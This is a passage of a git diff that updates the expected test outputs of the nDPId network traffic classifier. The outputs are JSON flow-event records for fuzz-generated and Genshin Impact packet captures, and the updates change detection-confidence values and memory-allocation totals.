{"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998605741,"flow_last_seen":1528998605741,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1528998576080,"flow_last_seen":1528998643334,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":7430,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528998257171,"flow_last_seen":1528998557443,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2362,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998605741,"flow_last_seen":1528998605741,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576181,"flow_last_seen":1528998576181,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1814,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576181,"flow_last_seen":1528998576181,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1814,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998584808,"flow_last_seen":1528998584808,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"57.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":28948,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998584808,"flow_last_seen":1528998584808,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"57.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":28948,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998636010,"flow_last_seen":1528998636010,"flow_idle_time":620000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":37,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998636010,"flow_last_seen":1528998636010,"flow_idle_time":620000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":37,"flow_datalink":1,"flow_max_packets":3} 00581{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","packets-captured":366,"packets-processed":301,"total-skipped-flows":0,"total-l4-payload-len":129798,"total-not-detected-flows":19,"total-guessed-flows":3,"total-detected-flows":57,"total-detection-updates":0,"total-updates":13,"current-active-flows":0,"total-active-flows":79,"total-idle-flows":79,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":482,"global_ts_msec":1528998643334} @@ -488,9 +488,9 @@ ~~ total active/idle flows...: 79/79 ~~ total timeout flows.......: 13 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5960768 bytes -~~ total memory freed........: 5960768 bytes -~~ total allocations/frees...: 118724/118724 +~~ total memory allocated....: 6094402 bytes +~~ total memory freed........: 6094402 bytes +~~ total allocations/frees...: 121486/121486 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 201 chars ~~ json string max len.......: 1566 chars diff --git a/test/results/fuzz-2021-06-07-c6c72a0a56.pcap.out b/test/results/fuzz-2021-06-07-c6c72a0a56.pcap.out index 997f3a41f..1f6f3b4da 100644 --- a/test/results/fuzz-2021-06-07-c6c72a0a56.pcap.out +++ b/test/results/fuzz-2021-06-07-c6c72a0a56.pcap.out @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 229 chars ~~ json string max len.......: 577 chars diff --git a/test/results/fuzz-2021-10-13.pcap.out b/test/results/fuzz-2021-10-13.pcap.out index b947b92fd..bc61a457e 100644 --- a/test/results/fuzz-2021-10-13.pcap.out +++ b/test/results/fuzz-2021-10-13.pcap.out @@ -11,9 +11,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 208 chars ~~ json string max len.......: 561 chars diff --git a/test/results/genshin-impact.pcap.out b/test/results/genshin-impact.pcap.out index 2b952e68e..ca529a078 100644 --- a/test/results/genshin-impact.pcap.out +++ b/test/results/genshin-impact.pcap.out @@ -2,45 +2,45 @@ 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"genshin-impact.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1615497372822} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1615497372822,"flow_last_seen":1615497372822,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1615497372822,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.245.143.85","src_port":58766,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1615497372822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1615497372822,"pkt":"eJS0JASgYDjgxTWgCABFAAAwrR4AAD8RTEjAqAJkL\/WPVeWOVlUAHPQTAAAA\/wAAAAAAAAAASZYC0v\/\/\/\/8="} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1615497372822,"flow_last_seen":1615497372822,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1615497372822,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.245.143.85","src_port":58766,"dst_port":22101,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1615497372822,"flow_last_seen":1615497372822,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1615497372822,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.245.143.85","src_port":58766,"dst_port":22101,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1615497372843,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1615497372843,"pkt":"YDjgxTWgeJS0JASgCABFAAAwK09AADcRlhcv9Y9VwKgCZFZV5Y4AHKXfAAABRQADGDI6DaIVSZYC0hRRRUU="} 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1615497372883,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1615497372883,"pkt":"eJS0JASgYDjgxTWgCABFAADFrx4AAD8RSbPAqAJkL\/WPVeWOVlUAsVF7MhgDABWiDTpRAAABg6QlIwAAAAAAAAAAUQAAAOjKqWZw7UqL9Yt3c0eSZwkZnnlWAs83g1p8EKxdCAGrvC1rqvpVXt+DS9GDIp59mUEo7M9A0R8PnQy3bk3e+QGIcWRmxHcBqUQOH+f\/uJk3ozIYAwAVog06UQAAAYOkJSMBAAAAAAAAACAAAADoyqkGcO9Ki\/W6d3BfbJ9hSIrPxLFWnBNUYf2O83uxMA=="} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"genshin-impact.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":4307,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1617969465739} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1617969465739,"flow_last_seen":1617969465739,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1617969465739,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.254.169.109","src_port":59145,"dst_port":22102,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1617969465739,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1617969465739,"pkt":"eJS0JASgYDjgxTWgCABFAAAwIDwAAD8RvwnAqAJkL\/6pbecJVlYAHFkOAAAA\/wAAAAC6msTNSZYC0v\/\/\/\/8="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1617969465739,"flow_last_seen":1617969465739,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1617969465739,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.254.169.109","src_port":59145,"dst_port":22102,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1617969465739,"flow_last_seen":1617969465739,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1617969465739,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.254.169.109","src_port":59145,"dst_port":22102,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1617969465761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1617969465761,"pkt":"YDjgxTWgeJS0JASgCABFAAAwmj1AADcRDQgv\/qltwKgCZFZW5wkAHNyDAAABRQACIqy6msTNSZYC0hRRRUU="} 00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1617969465796,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":1617969465796,"pkt":"eJS0JASgYDjgxTWgCABFAACLETwAAD8Rza7AqAJkL\/6pbecJVlYAd4PurCICAM3EmrpRAAABbMl+tgAAAAAAAAAAUwAAAOjKqWZw60qL9Yt3tYWQf\/bh4A8CmEwZmVNWIKRXCgqptAdyiLYHXIWEStbbdMV+nhEs6cNA1hYEnQ\/rbBPfqVmPcWA0wHkHrhALTrzN2JnmCbMb"} -00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1615497372822,"flow_last_seen":1615497374454,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1181,"flow_tot_l4_payload_len":4307,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1617969467485,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.245.143.85","src_port":58766,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1615497372822,"flow_last_seen":1615497374454,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1181,"flow_tot_l4_payload_len":4307,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1617969467485,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.245.143.85","src_port":58766,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","packets-captured":31,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":6297,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1618759616491} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618759616491,"flow_last_seen":1618759616491,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1618759616491,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"8.209.69.191","src_port":52575,"dst_port":22101,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1618759616491,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1618759616491,"pkt":"eJS0JASgYDjgxTWgCABFAAAwGRQAAD8RUQ3AqAJkCNFFv81fVlUAHHz9AAAA\/wAAAAAAAAAASZYC0v\/\/\/\/8="} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618759616491,"flow_last_seen":1618759616491,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1618759616491,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"8.209.69.191","src_port":52575,"dst_port":22101,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618759616491,"flow_last_seen":1618759616491,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1618759616491,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"8.209.69.191","src_port":52575,"dst_port":22101,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1618759616511,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1618759616511,"pkt":"YDjgxTWgeJS0JASgCABFAAAwBJVAADYRLowI0UW\/wKgCZFZVzV8AHCclAAABRQAC8VwSg\/gZSZYC0hRRRUU="} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1618759616572,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1618759616572,"pkt":"eJS0JASgYDjgxTWgCABFAADFKAcAAD8RQYXAqAJkCNFFv81fVlUAsRpMXPECABn4gxJRAAAB+IeX5QAAAAAAAAAAUQAAAOjKqWZw7UqL9Yt3c0eSZxk9sU5aAs83g1pzHa9XCgisvC1r9\/0GCIzdTdWOJM16x0h+u8IR0UsPmVrqPkXeqgnccmMxz3oCrkMOS+f\/uJk3o1zxAgAZ+IMSUQAAAfiHl+UBAAAAAAAAACAAAADoyqkGcO9Ki\/W6d3BffbtOf4bPxP18xxJUYUezQnixMA=="} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"genshin-impact.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1617969465739,"flow_last_seen":1617969467485,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":608,"flow_tot_l4_payload_len":1990,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1618759618761,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"47.254.169.109","src_port":59145,"dst_port":22102,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GenshinImpact","breed":"Fun","category":"Game"}} 